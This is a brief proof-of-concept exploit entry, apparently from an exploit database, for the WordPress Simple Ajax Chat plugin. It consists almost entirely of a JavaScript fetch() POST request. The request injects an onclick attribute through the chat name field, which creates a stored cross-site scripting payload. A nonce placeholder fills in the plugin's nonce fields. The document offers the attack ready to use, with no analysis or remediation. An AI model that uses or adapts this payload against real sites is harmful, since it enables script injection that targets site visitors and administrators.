Share
## https://sploitus.com/exploit?id=WPEX-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB
await fetch("http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0",
        "Accept": "*/*",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-GPC": "1"
    },
    "body": "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE",
    "method": "POST",
    "mode": "cors"
});